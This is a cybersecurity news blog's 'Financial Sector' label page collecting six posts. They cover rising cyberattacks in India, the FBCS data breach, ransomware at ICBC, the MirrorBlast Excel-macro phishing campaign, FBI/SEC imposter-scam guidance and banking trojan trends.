Search This Blog
Powered by Blogger.

Blog Archive

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label Financial Sector. Show all posts
Software
AI Cloud Computing Cyber Attacks Digital threats Financial Sector Healthcare India RBI Software

Cyberattacks Skyrocket in India, Are We Ready for the Digital Danger Ahead?


 

India is experiencing a rise in cyberattacks, particularly targeting its key sectors such as finance, government, manufacturing, and healthcare. This increase has prompted the Reserve Bank of India (RBI) to urge banks and financial institutions to strengthen their cybersecurity measures.

As India continues to digitise its infrastructure, it has become more vulnerable to cyberattacks. Earlier this year, hackers stole and leaked 7.5 million records from boAt, a leading Indian company that makes wireless audio and wearable devices. This is just one example of how cybercriminals are targeting Indian businesses and institutions.

The RBI has expressed concern about the growing risks in the financial sector due to rapid digitization. In 2023 alone, India’s national cybersecurity team, CERT-In, handled about 16 million cyber incidents, a massive increase from just 53,000 incidents in 2017. Most banks and non-banking financial companies (NBFCs) now see cybersecurity as a major challenge as they move towards digital technology. The RBI’s report highlights that the speed at which information and rumours can spread digitally could threaten financial stability. Cybercriminals are increasingly focusing on financial institutions rather than individual customers.

The public sector, including government agencies, has also seen a dramatic rise in cyberattacks. Many organisations report that these attacks have increased by at least 50%. Earlier this year, a hacking group targeted government agencies and energy companies using a type of malware known as HackBrowserData. Additionally, countries like Pakistan and China have been intensifying their cyberattacks on Indian organisations, with operations like the recent Cosmic Leopard campaign.

According to a report by Cloudflare, 83% of organisations in India experienced at least one cybersecurity incident in the last year, placing India among the top countries in Asia facing such threats. Globally, India is the fifth most breached nation, bringing attention  to the bigger picture which screams for stronger cybersecurity measures.

Indian companies are most worried about threats related to cloud computing, connected devices, and software vulnerabilities. The adoption of new technologies like artificial intelligence (AI) and cloud computing, combined with the shift to remote work, has accelerated digital transformation, but it also increases the need for stronger security measures.

Manu Dwivedi, a cybersecurity expert from PwC India, points out that AI-powered phishing and sophisticated social engineering techniques have made ransomware a top concern for organisations. As more companies use cloud services and open-source software, the risk of cyberattacks grows. Dwivedi also stresses the importance of protecting against insider threats, which requires a mix of strategy, culture, training, and governance.

AI is playing a growing role in both defending against and enabling cyberattacks. While AI has the potential to improve security, it also introduces new risks. Cybercriminals are beginning to use AI to create more advanced malware that can avoid detection. Dwivedi warns that as AI continues to evolve, it may become harder to track how these tools are being misused by attackers.

Partha Gopalakrishnan, founder of PG Advisors, emphasises the need for India to update its cybersecurity laws. The current law, the Information Technology Act of 2000, is outdated and does not fully address today’s digital threats. Gopalakrishnan also stressed upon the growing demand for AI skills in India, suggesting that businesses should focus on training in both AI and cybersecurity to close the skills gap. He warns that as AI becomes more accessible, it could empower a wider range of people to carry out sophisticated cyberattacks.

India’s digital growth presents great opportunities, but it also comes with strenuous challenges. It’s crucial for Indian businesses and government agencies to develop comprehensive cybersecurity strategies and stay vigilant.


Read more »
SSNs
Data Breach FBCS Financial Sector phishing Sensitive data SSNs

FBCS Data Breach Affects 4.2 Million Americans


 


Financial Business and Consumer Solutions (FBCS), a debt collection agency, has announced that a data breach in February 2024 has now affected 4.2 million people in the U.S. This is a drastic rise from previous reports and underscores the growing impact of the breach.

Initially, in April, FBCS reported that 1.9 million individuals had their sensitive information compromised due to a breach on February 14, 2024. In May, this number was revised upward to 3.2 million. Recently, a new notice filed with the Office of the Maine Attorney General increased the total number of affected individuals to 4,253,394.

Types of Compromised Data

The breached information varies per person but includes highly sensitive data such as full names, Social Security Numbers (SSNs), birth dates, account information, and driver’s licence or ID card numbers. This level of data exposure poses serious risks of identity theft and fraud.

Company's Response and Notifications

Starting July 23, FBCS began notifying the additional people impacted by the breach. These notifications warn recipients about the increased risk of phishing and fraud attempts. The company is also offering free 24-month credit monitoring and identity restoration services through CyEx to help those affected.

Details of the Breach

The breach was discovered by FBCS on February 26, 2024, when the company detected unauthorised access to specific systems within its internal network. Despite the severity of the incident, FBCS has not disclosed detailed information about the nature of the attack or identified any individuals or groups responsible for the breach. The company has assured that the unauthorised access was confined to its internal systems and did not extend to computer systems outside its network. So far, no ransomware gangs have claimed responsibility for the breach, leaving the exact methods and perpetrators of the attack unknown.

FBCS advises those affected to remain vigilant against phishing attempts designed to steal more personal information. It is also recommended that individuals closely monitor their credit reports for any signs of fraudulent activity or unauthorised loans, as the exposed information could be used for identity theft.

This FBCS data breach helps us see vulnerabilities in a fresh light within the financial sector. As FBCS works to manage the repercussions, it is crucial for affected individuals to take protective measures to safeguard their personal information and mitigate potential risks.


Read more »
Wall Street Market
China Data Breach Financial Data Financial Sector ICBC cyberattack Ransomware Attacks. servers Threat actor Wall Street Market

Ransomware Shakes ICBC: Global Financial Markets on High Alert

In a startling turn of events, Wall Street was rocked by a devastating ransomware attack that affected China's Industrial and Commercial Bank of China (ICBC), the country's biggest lender. The attack disrupted trade and brought attention to the growing threat of cybercrime in the financial sector.

The attack, which targeted ICBC, was not only a significant blow to the bank but also had far-reaching implications on the global financial landscape. Wall Street, closely intertwined with international markets, experienced a temporary halt in trade as the news of the cyber assault reverberated across financial news outlets.

The ransomware attack on ICBC serves as a stark reminder of the vulnerability of even the most robust financial institutions to sophisticated cyber threats. The attackers, exploiting weaknesses in ICBC's cybersecurity infrastructure, managed to compromise critical systems, causing widespread disruptions and raising concerns about the broader implications for the global financial ecosystem.

As information about the attack unfolded, reports indicated that ICBC struggled to contain the breach promptly. The incident prompted regulatory bodies and financial institutions worldwide to reevaluate their cybersecurity measures, recognizing the urgent need for robust defenses against evolving cyber threats.

The consequences of such attacks extend beyond financial disruptions. They underscore the importance of collaborative efforts among nations and private enterprises to strengthen global cybersecurity frameworks. The interconnected nature of the modern financial system demands a united front against cyber threats, with a focus on information sharing, technological innovation, and proactive defense strategies.

In the aftermath of the ICBC attack, financial markets witnessed increased scrutiny from regulators, urging institutions to fortify their cybersecurity postures. This incident serves as a wake-up call for the industry, emphasizing the need for continuous investment in cybersecurity measures, employee training, and the adoption of cutting-edge technologies to stay ahead of evolving threats.

The broader implications of the ICBC ransomware attack are not limited to the financial sector alone. They underscore the need for a collective and proactive approach to cybersecurity across industries, as cyber threats continue to grow in scale and sophistication. As nations and businesses grapple with the aftermath of this attack, it becomes increasingly evident that cybersecurity is a shared responsibility that transcends borders and industries.

Read more »
phishing
Antivirus Cyber Data Cyber Fraud Excel File Fake Emails Financial Sector Fraud Website Malware Distribution MirrorBlast phishing

This New Phishing Attack Uses a Weaponized Excel File

 

A new phishing campaign is targeting financial sector employees by using links to download a ‘weaponized’ Excel document.

MirrorBlast, a phishing effort, was discovered in early September by security firm ET Labs. Morphisec, a fellow security firm, has now studied the malware and warns that the malicious Excel files might escape malware-detection systems due to "extremely lightweight" embedded macros, making it especially risky for businesses that rely on detection-based protection and sandboxing. 

Macros, or scripts for automating activities, have grown in popularity among cybercriminals. Despite the fact that macros are disabled by default in Excel, attackers employ social engineering to deceive potential victims into allowing macros. Despite appearing to be a simple approach, macros have been employed by state-sponsored hackers because they frequently work. 

Microsoft earlier this year extended its Antimalware Scan Interface (AMSI) for antivirus to combat the rise in macro malware and a recent phenomenon by attackers to utilise outdated Excel 4.0 XLM macros (rather than newer VBA macros) to circumvent anti-malware systems. 

As per Morphisec, the MirrorBlast attack chain is similar to tactics used by TA505, a well-established, financially focused Russia-based cybercriminal group. The group has been active since at least 2014 and is well-known for its usage of a wide range of tools. 

Morphisec researcher Arnold Osipov stated in a blog post, "TA505 is most known for frequently changing the malware they use as well as driving global trends in malware distribution." 

While the MirrorBlast attack begins with a document attached to an email, it afterwards uses a Google feed proxy URL with a SharePoint and OneDrive trap that masquerades as a file-sharing request. When the user clicks the URL, they are sent to a hacked SharePoint site or a bogus OneDrive site. Both versions will take to the malicious Excel document. 

The sample MirrorBlast email demonstrates how the attackers are capitalising on company-issued data on COVID-related modifications to working conditions. Morphisec points out that due to compatibility issues with ActiveX components, the macro code can only be run on a 32-bit version of Office. The macro itself runs a JavaScript script meant to avoid sandboxing by determining if the computer is in administrator mode. The msiexec.exe process is then launched, which downloads and instals an MSI package. 

Morphisec discovered two MIS installation versions that employed legal scripting tools named KiXtart and REBOL. The KiXtart script transmits information about the victim's workstation to the attacker's command and control server, including the domain, computer name, user name, and process list. It then answers with a number indicating whether the Rebol version should be used. Morphisec states that the Rebol script leads to a remote access tool called FlawedGrace, which the group has previously utilised. 

Osipov added, "TA505 is one of many financially motivated threat groups currently active in the marketplace. They are also one of the most creative, as they have a tendency to constantly shift the attacks they leverage to achieve their goals." 
Read more »
investment fraud.
Cyber Fraud data security Financial Sector investment fraud.

The FBI and SEC Provided Guidance Against Imposter Scams

 

The FBI and SEC have come with new guidance for investors to fight against financial scams. Users are being suggested to reject and report fraud if they want to protect their business from scams and save their money from being paid to an imposter. 

Among various sectors, consumer markets have taken a major hit as stringent lockdowns have brought economic activity to a standstill. 

Nowadays, cyber-attackers are employing highly sophisticated tricks to carry out financial scams activity. According to the FBI's Criminal Investigative Division, and the United States Securities and Exchange Commission, fraudsters always try to mock as they are a real broker or investment adviser and trick users. Once a belief has been suspended, the fraudsters can trick investors into surrendering more information. 

The FBI and the SEC said, that cybercriminals are using very advanced technology for becoming real investors including fake social media profiles, fake websites that look exact to those of legitimate firms and are hiding their actual locations. 

In addition, cybercriminals have been falsifying legitimate documents, like public reports with a real identity and Central Registration Depository (CRD) numbers but unorganized firm names. Fraudsters who are tricking investors reportedly used poor grammar and had spelling errors. Besides the FBI and the SEC, a similar warning had been issued by FINRA last week. 

"The doctored BrokerCheck report was emailed to potential “clients” using the name and CRD number of a registered investment professional—but with a company that is not registered as a broker-dealer with FINRA..." 

"...The solicitation included other documentation and a request for investors to respond with a photo of their driver’s license and other personal information...", the group wrote. 

Safety Measures

•According to the FBI and SEC recommendation if someone is claiming that investment is legitimate then users should research their name on Investor.gov, and verify thoroughly. 

• Be aware of fake offers like high investment returns 

•Before going ahead with any firm, investors are advised to use FINRA's BrokerCheck to verify. 

•The FBI and SEC also highlighted that most licensed and registered investment organizations don't allow investors to use credit cards or cryptocurrencies to invest, so you are advised to think twice before making investments. 

•At the of payment, investors are advised not to send money directly without verifying the recipient. Also, one must not send personal data including date of birth, driver's license number, or any other official documents.
Read more »
malware
Banking Trojans Financial Sector malware

Banking Trojen rises as the Top Security Concern


According to a new research by Blueliv, banking trojans have risen as the biggest threat to the Financial sector second only to mobile malware. A twitter poll conducted by cyberthreat intelligence provider Blueliv, from 11,000 users revealed that a third of respondents were concerned about the impact banking Trojans (31 percent) and mobile malware (28 percent) will have on financial services organizations and their customers in 2020. Tracking these financial threats, Blueliv researchers observed an increase in Trickbot banking trojan (283%) and a 130% increase in Dridex botnets. These Q2 and Q3 botnets are believed to be distributing banking trojans and malware in the financial sector and their customers.


Skill shortage and lack of visibility of threats present as security challenge- According to the poll, the financial sector is suffering from a major skill shortage in building security programs and identifying security threats - the most pressing being a shortage of skills (28 percent), followed by the high volume of threats and alerts (26 percent) and a lack of visibility into cyber threats (20 percent) (by Blueliv). Realwire quotes, "This is hardly surprising: as financial services institutions (FSIs) embrace digital processes and new customer interaction channels, so their attack surface grows, making it harder to keep on top of threats ranging from Point-of-Sale (PoS) to ATM malware, mobile apps malware to card skimmers."

A recent data by (ISC)2 shows that the global skills shortage has crossed 4 million. In Europe alone, the shortage has bypassed 100 percent. Daniel Solís, CEO and founder, Blueliv says, “Organizations in the financial sector face a constantly changing threat landscape. Business priorities have shifted and digital risk management is now central. Because they are such high-value targets for cybercriminal activity, it is imperative that financial services organizations monitor what is happening both inside and outside their networks in real-time to create effective mitigation strategies before, during and after an attack.”

He further commented, “FSI (financial services institutions) security teams can be easily overwhelmed by the number of threat alerts they receive which can very quickly result in alert fatigue and desensitization to real, preventable threats. Threat intelligence can address the cyber skills gap through continuous automated monitoring combined with the human resource to provide context, helping FSIs develop highly-targeted threat detection, prevention, and investigation capabilities.”

Financial organizations are prime suspects for attacks, even after having the most sophisticated cyber defense strategies, weak spots do remain and are being exploited by trojans and malware overlooked by fraud risk assessment teams due to skills shortage and poor threat visibility.
Read more »
Subscribe to: Posts (Atom)